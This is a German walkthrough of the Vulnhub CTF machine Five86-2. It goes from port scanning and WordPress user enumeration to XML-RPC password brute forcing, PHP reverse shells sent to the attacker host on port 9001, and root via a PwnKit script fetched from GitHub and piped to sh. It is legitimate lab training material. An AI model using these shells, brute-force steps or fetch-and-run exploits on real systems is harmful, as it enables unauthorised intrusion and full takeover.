Five86-2 - Vulnhub - Level: Medium - Bericht

Medium

Verwendete Tools

nmap
curl
Nikto
Gobuster
Wpscan
zip
nc
Find
Cat
stty
sh

Inhaltsverzeichnis

Reconnaissance

In diesem Abschnitt führen wir die ersten Schritte der Aufklärung durch, um Informationen über das Zielsystem zu sammeln. Dies ist entscheidend, um potenzielle Angriffsvektoren zu identifizieren.

┌──(root㉿CCat)-[~]
└─# ARP-Scan
192.168.2.118 08:00:27:5c:a0:4d PCS Systemtechnik GmbH

Der ARP-Scan zeigt die IP-Adresse und die MAC-Adresse des Zielsystems. Die Angabe "PCS Systemtechnik GmbH" deutet auf den Hersteller der Netzwerkkarte hin.

┌──(root㉿CCat)-[~]
└─# /etc/hosts
192.168.2.118 five86_2.vln

Die /etc/hosts-Datei ordnet die IP-Adresse dem Hostnamen "five86_2.vln" zu. Dies ermöglicht die Verwendung des Hostnamens anstelle der IP-Adresse.

┌──(root㉿CCat)-[~]
└─# nmap -sS -sC -sV -A -p- $IP -Pn --min-rate 5000 | grep open
21/tcp open ftp ProFTPD 1.3.5e 80/tcp open http Apache httpd 2.4.41 ((Ubuntu))

Dieser Nmap-Befehl sucht nach offenen Ports und filtert die Ausgabe nach Zeilen, die "open" enthalten. Die Ergebnisse zeigen, dass die Ports 21 (FTP) und 80 (HTTP) offen sind.

┌──(root㉿CCat)-[~]
└─# nmap -sS -sC -sV -A -p- $IP -Pn --min-rate 5000 
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-10-02 22:24 CEST
Nmap scan report for five86_2.vln (192.168.2.118)
Host is up (0.00019s latency).
Not shown: 65532 filtered tcp ports (no-response)
PORT   STATE SERVICE VERSION
20/tcp closed ftp-data
21/tcp open   ftp      ProFTPD 1.3.5e
80/tcp open   http     Apache httpd 2.4.41 ((Ubuntu))
|_http-generator: WordPress 5.1.4
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Five86-2 – Just another WordPress site
MAC Address: 08:00:27:5C:A0:4D (Oracle VirtualBox virtual NIC)
Aggressive OS guesses: Linux 5.0 - 5.4 (98%), Linux 4.15 - 5.8 (94%), Linux 5.0 - 5.5 (93%), Linux 5.1 (93%), Linux 2.6.32 - 3.13 (93%), Linux 2.6.39 (93%), Linux 2.6.22 - 2.6.36 (91%), Linux 3.10 - 4.11 (91%), Linux 5.0 (91%), Linux 3.10 (91%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 1 hop

Nmap führt einen umfassenden Scan des Zielsystems durch.

  • -sS: TCP-SYN-Scan (Stealth Scan)
  • -sC: Führt Standard-Skripte zur Erkennung von Diensten aus.
  • -sV: Erkennt die Version der laufenden Dienste.
  • -A: Aktiviert aggressive Scan-Optionen (OS-Erkennung, Versionserkennung, Skriptausführung, Traceroute).
  • -p-: Scannt alle 65535 Ports.
  • $IP: Variable für die Ziel-IP-Adresse.
  • -Pn: Verhindert Ping-Anfragen, behandelt alle Hosts als "up".
  • --min-rate 5000: Sendet Pakete mit einer minimalen Rate von 5000 pro Sekunde.
Die Ergebnisse zeigen, dass die Ports 21 (FTP) und 80 (HTTP) offen sind. Auf Port 80 läuft ein Apache-Webserver mit WordPress.

Web Enumeration

In diesem Abschnitt untersuchen wir die Webanwendung genauer, um versteckte Dateien, Verzeichnisse und potenzielle Schwachstellen aufzudecken.

┌──(root㉿CCat)-[~]
└─# curl --verbose -I http://$IP -s 
*   Trying 192.168.2.118:80...
* Connected to 192.168.2.118 (192.168.2.118) port 80
> HEAD / HTTP/1.1
> Host: 192.168.2.118
> User-Agent: curl/8.9.1
> Accept: */*
> 
* Request completely sent off
< HTTP/1.1 200 OK
< Date: Wed, 02 Oct 2024 20:25:59 GMT
< Server: Apache/2.4.41 (Ubuntu)
< Link: ; rel="https://api.w.org/"
< Content-Type: text/html; charset=UTF-8
< 

* Connection #0 to host 192.168.2.118 left intact

Wir verwenden curl, um die HTTP-Header der Webseite abzurufen. Der Link-Header verweist auf die WordPress-REST-API.

http://five86-2/index.php/wp-json/ 
{
"name": "Five86-2",
"description": "Just another WordPress site",
"url": "http://five86-2",
"home": "http://five86-2",
"gmt_offset": "0",
"timezone_string": "",
"namespaces": [
"oembed/1.0",
"articulate/v1",
"wp/v2"
],
"authentication": []
}

Die WordPress-REST-API gibt Informationen über die Webseite zurück.

┌──(root㉿CCat)-[~]
└─# curl http://five86-2/index.php/wp-json/wp/V2/users/1 -s | tr "," "\n" 
{"id":1
"name":"admin"
"url":""
"description":""
"link":"http:\/\/five86-2\/index.php\/author\/admin\/"
"slug":"admin"
"avatar_urls":{"24":"http:\/\/1.gravatar.com\/avatar\/d4f37335cc757002e41f971e7a4c1ce4?s=24&d=mm&r=g"
"48":"http:\/\/1.gravatar.com\/avatar\/d4f37335cc757002e41f971e7a4c1ce4?s=48&d=mm&r=g"
"96":"http:\/\/1.gravatar.com\/avatar\/d4f37335cc757002e41f971e7a4c1ce4?s=96&d=mm&r=g"}
"meta":[]
"_links":{"self":[{"href":"http:\/\/five86-2\/index.php\/wp-json\/wp\/v2\/users\/1"}]
"collection":[{"href":"http:\/\/five86-2\/index.php\/wp-json\/wp\/v2\/users"}]}}

Wir verwenden die WordPress-REST-API, um Informationen über den Benutzer mit der ID 1 abzurufen. Der Benutzername ist "admin".

┌──(root㉿CCat)-[~]
└─# Nikto v2.5.0 
+ Target IP:          192.168.2.118
+ Target Hostname:    192.168.2.118
+ Target Port:        80
+ Start Time:         2024-10-02 22:27:45 (GMT2)

+ Server: Apache/2.4.41 (Ubuntu)
+ /: The anti-clickjacking X-Frame-Options header is not present. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options
+ /: Drupal Link header found with value: ; rel="https://api.w.org/". See: https://www.drupal.org/
+ /: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/
+ /index.php?: Uncommon header 'x-redirect-by' found, with contents: WordPress.
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Apache/2.4.41 appears to be outdated (current is at least Apache/2.4.54). Apache 2.2.34 is the EOL for the 2.x branch.
+ /: Web Server returns a valid response with junk HTTP methods which may cause false positives.
+ /wp-content/plugins/akismet/readme.txt: The WordPress Akismet plugin 'Tested up to' version usually matches the WordPress version.
+ /wp-links-opml.php: This WordPress script reveals the installed version.
+ /license.txt: License file found may identify site software.
+ /: A WordPress installation was found.
+ /wp-login.php?action=register: Cookie wordpress_test_cookie created without the httponly flag. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Cookies
+ /wp-content/uploads/: Directory indexing found.
+ /wp-content/uploads/: Wordpress uploads directory is browsable. This may reveal sensitive information.
+ /wp-login.php: Wordpress login found.
+ 8102 requests: 0 error(s) and 14 item(s) reported on remote host
+ End Time:           2024-10-02 22:28:31 (GMT2) (46 seconds)

+ 1 host(s) tested

Nikto ist ein Webserver-Scanner, der auf Schwachstellen und Konfigurationsfehler prüft. Die Ergebnisse zeigen verschiedene potenzielle Probleme, wie fehlende HTTP-Header, eine veraltete Apache-Version und ein durchsuchbares Uploads-Verzeichnis.

┌──(root㉿CCat)-[~]
└─# gobuster dir -u "http://$IP" -w "/usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt" -x txt,php,rar,zip,tar,pub,xls,docx,doc,sql,db,mdb,asp,aspx,accdb,bat,ps1,exe,sh,py,pl,gz,jpeg,jpg,png,html,phtml,xml,csv,dll,pdf,raw,rtf,xlsx,zip,kdbx,bak,svg,pem,crt,json,conf,ELF,elf,c,java,lib,cgi,csh,config,deb,desc,exp,eps,diff,icon,mod,ln,old,rpm,js.map,pHtml -b '503,404,403' -e --no-error -k 
http://192.168.2.118/index.php            (Status: 301) [Size: 0] [--> http://192.168.2.118/]
http://192.168.2.118/wp-content           (Status: 301) [Size: 319] [--> http://192.168.2.118/wp-content/]
http://192.168.2.118/wp-content           (Status: 301) [Size: 319] [--> http://192.168.2.118/wp-content/]
http://192.168.2.118/wp-login.php         (Status: 200) [Size: 3190]
http://192.168.2.118/license.txt          (Status: 200) [Size: 19935]
http://192.168.2.118/wp-includes          (Status: 301) [Size: 320] [--> http://192.168.2.118/wp-includes/]
http://192.168.2.118/readme.html          (Status: 200) [Size: 7425]
http://192.168.2.118/wp-trackback.php     (Status: 200) [Size: 135]
http://192.168.2.118/wp-admin             (Status: 301) [Size: 317] [--> http://192.168.2.118/wp-admin/]
http://192.168.2.118/xmlrpc.php           (Status: 405) [Size: 42]
http://192.168.2.118/wp-signup.php        (Status: 302) [Size: 0] [--> http://five86-2/wp-login.php?action=register]

Gobuster findet verschiedene WordPress-Dateien und -Verzeichnisse.

Initial Access

In diesem Abschnitt versuchen wir, uns initialen Zugriff auf das System zu verschaffen.

┌──(root㉿CCat)-[~]
└─# wpscan --url http://five86-2/ --passwords /usr/share/wordlists/rockyou.txt -e u 
_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.8.25
       Sponsored by Automattic - https://automattic.com/
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[+] URL: http://five86-2/ [192.168.2.118]
[+] Started: Wed Oct  2 22:39:39 2024

Interesting Finding(s):

[+] Headers
 | Interesting Entry: Server: Apache/2.4.41 (Ubuntu)
 | Found By: Headers (Passive Detection)
 | Confidence: 100%

[+] XML-RPC seems to be enabled: http://five86-2/xmlrpc.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%
 | References:
 |  - http://codex.wordpress.org/XML-RPC_Pingback_API
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
 |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/


[+] WordPress theme in use: twentynineteen
 | Location: http://five86-2/wp-content/themes/twentynineteen/
 | Last Updated: 2024-07-16T00:00:00.000Z
 | Readme: http://five86-2/wp-content/themes/twentynineteen/readme.txt
 | [!] The version is out of date, the latest version is 2.9
 | Style URL: http://five86-2/wp-content/themes/twentynineteen/style.css?ver=1.3
 | Style Name: Twenty Nineteen
 | Style URI: https://github.com/WordPress/twentynineteen
 | Description: ur 2019 default theme is designed to show off the power of the block editor. It features custom sty...
 | Author: the WordPress team
 | Author URI: https://wordpress.org/
 |
 | Found By: Css Style In Homepage (Passive Detection)
 |
 | Version: 1.3 (80% confidence)
 | Found By: Style (Passive Detection)
 |  - http://five86-2/wp-content/themes/twentynineteen/style.css?ver=1.3, Match: 'Version: 1.3'

[+] Enumerating Users (via Passive and Aggressive Methods)
 Brute Forcing Author IDs - Time: 00:00:00 <> (10 / 10) 100.00% Time: 00:00:00

[i] User(s) Identified:


[+] admin
 | Found By: Author Posts - Author Pattern (Passive Detection)
 | Confirmed By:
 |  Rss Generator (Passive Detection)
 |  Wp Json Api (Aggressive Detection)
 |   - http://five86-2/index.php/wp-json/wp/v2/users/?per_page=100&page=1
 |  Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 |  Login Error Messages (Aggressive Detection)

[+] barney
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[+] peter
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[+] gillian
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[+] stephen
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[+] Performing password attack on Xmlrpc against 5 user/s
 
 [+] Performing password attack on Xmlrpc against 5 user/s
[SUCCESS] - barney / spooky1
[SUCCESS] - stephen / apollo1
                                                                 
 
[!] Valid Combinations Found:
 | Username: barney, Password: spooky1
 | Username: stephen, Password: apollo1

^Cying admin / daniela Time: 00:00:03 <               > (325 / 71722399)  0.00%  ETA: ??:??:??
Scan Aborted: Canceled by User

Wir verwenden WPScan, um WordPress-spezifische Informationen abzurufen und Benutzer zu enumerieren. WPScan findet die Benutzernamen "admin", "barney", "peter", "gillian" und "stephen" sowie die Passwörter für "barney" und "stephen".

Wir verwenden das gefundene Passwort um uns anzumelden.

Da es nicht mit dem hochladen geklappt hat , verwenden wir einen anderen shell

┌──(root㉿CCat)-[/home/ccat/Downloads]
└─# cat shell.php
exec("/bin/bash -c 'bash -i >& /dev/tcp/192.168.2.199/9001 0>&1'");

Wir verwenden einen anderen shell mit den folgenden Inhalt.

┌──(root㉿CCat)-[/home/ccat/Downloads]
└─# cat index.php
$sock=fsockopen("192.168.2.199",9001);$proc=proc_open("/bin/sh -i", array(0=>$sock, 1=>$sock, 2=>$sock),$pipes);

Wir erstellen eine Zip mit den shell Dateien.

┌──(root㉿CCat)-[/home/ccat/Downloads]
└─# zip poc.zip index.php index.html
adding: index.php (deflated 20%) adding: index.html (deflated 11%)

Wir erstellen eine verbindung auf port 9001.

┌──(root㉿CCat)-[~]
└─# nc -lvnp 9001 
listening on [any] 9001 ...
connect to [192.168.2.199] from (UNKNWN) [192.168.2.118] 36340
/bin/sh: 0: can't access tty; job control turned off
$

Wir erhalten eine Shell auf den System.

Privilege Escalation

In diesem Abschnitt versuchen wir, unsere Privilegien auf dem System zu erhöhen, um Root-Zugriff zu erlangen.

┌──(root㉿CCat)-[~]
└─# nc -lvnp 9001 
listening on [any] 9001 ...
connect to [192.168.2.199] from (UNKNWN) [192.168.2.118] 36340
/bin/sh: 0: can't access tty; job control turned off
$ find / -type f -perm -4000 -ls 2>/dev/null
       66     40 -rwsr-xr-x   1 root     root        40152 Jun 14  2022 /snap/core/17200/bin/mount
       80     44 -rwsr-xr-x   1 root     root        44168 May  7  2014 /snap/core/17200/bin/ping
       81     44 -rwsr-xr-x   1 root     root        44680 May  7  2014 /snap/core/17200/bin/ping6
       98     40 -rwsr-xr-x   1 root     root        40128 Feb  7  2024 /snap/core/17200/bin/su
      116     27 -rwsr-xr-x   1 root     root        27608 Jun 14  2022 /snap/core/17200/bin/umount 
     2606    331 -rwsr-xr-x   1 root     root              338536 Jun 26 13:11 /snap/core22/1621/usr/lib/openssh/ssh-keysign
     8635     19 -rwsr-xr-x   1 root     root               18736 Feb 26  2022 /snap/core22/1621/usr/libexec/polkit-agent-helper-1
      685     88 -rwsr-xr-x   1 root     root               88272 Aug 29  2019 /usr/bin/gpasswd
      883     32 -rwsr-xr-x   1 root     root               31032 Aug 16  2019 /usr/bin/pkexec
     3470     32 -rwsr-x   1 peter    ncgroup            30856 Apr 13  2017 /usr/bin/nc.traditional
      492     56 -rwsr-sr-x   1 daemon   daemon             55560 Nov 12  2018 /usr/bin/at
      816     56 -rwsr-xr-x   1 root     root               55528 Aug 21  2019 /usr/bin/mount
     1086     68 -rwsr-xr-x   1 root     root               67816 Aug 21  2019 /usr/bin/su
      560     84 -rwsr-xr-x   1 root     root               84848 Aug 29  2019 /usr/bin/chfn
      671     36 -rwsr-xr-x   1 root     root               34896 Mar  5  2019 /usr/bin/fusermount
      566     48 -rwsr-xr-x   1 root     root               48784 Aug 29  2019 /usr/bin/chsh
      862     68 -rwsr-xr-x   1 root     root               67992 Aug 29  2019 /usr/bin/passwd
     1156     40 -rwsr-xr-x   1 root     root               39144 Aug 21  2019 /usr/bin/umount
     1087    16   60 -rwsr-xr-x   1 root     root              161448 Oct 15  2019 /usr/bin/sudo
      830     44 -rwsr-xr-x   1 root     root               44600 Aug 29  2019 /usr/bin/newgrp
     1597    444 -rwsr-xr-x   1 root     root              453096 Sep 12  2019 /usr/lib/openssh/ssh-keysign
     1365     52 -rwsr-xr--   1 root     messagebus         51184 Jun 11  2019 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
     1607     24 -rwsr-xr-x   1 root     root               22840 Aug 16  2019 /usr/lib/policykit-1/polkit-agent-helper-1
     7745    116 -rwsr-sr-x   1 root     root              117672 Aug 30  2019 /usr/lib/snapd/snap-confine
     1373     16 -rwsr-xr-x   1 root     root               14488 Jul  8  2019 /usr/lib/eject/dmcrypt-get-device

Wir suchen nach SUID-Dateien. Der Befehl '/usr/bin/nc.traditional' fällt auf, da er dem Benutzer 'peter' und der Gruppe 'ncgroup' gehört.

www-data@five86-2:/var/www/html/wp-content/uploads/articulate_uploads/poc$ stty rows 48 columns 94

Stty Befehl um die Zeilen und Spalten anzupassen

www-data@five86-2:/var/www/html/wp-content/uploads/articulate_uploads/poc$ cd /tmp/
www-data@five86-2:/tmp$ sh -c "$(curl -fsSL https://raw.githubusercontent.com/ly4k/PwnKit/main/PwnKit.sh)"
root@five86-2:/tmp# id
uid=0(root) gid=0(root) groups=0(root),33(www-data)

Pwnkit wird verwendet

root@five86-2:/tmp# cd ~
root@five86-2: ls
snap thisistheflag.txt
root@five86-2: cat thisistheflag.txt

Flags

__   __            _                           _                                 _ _ _ _ _ 
\ \ / /           | |                         | |                               | | | | | |
 \ V /___  _   _  | |__   __ ___   _____    __| | ___  _ __   ___  __      _____| | | | | |
  \ // _ \| | | | | '_ \ / _` \ \ / / _ \  / _` |/ _ \| '_ \ / _ \ \ \ /\ / / _ \ | | | | |
  | | (_) | |_| | | | | | (_| |\ V /  __/ | (_| | (_) | | | |  __/  \ V  V /  __/ | |_|_|_|
  \_/\___/ \__,_| |_| |_|\__,_| \_/ \___|  \__,_|\___/|_| |_|\___|   \_/\_/ \___|_|_(_|_|_)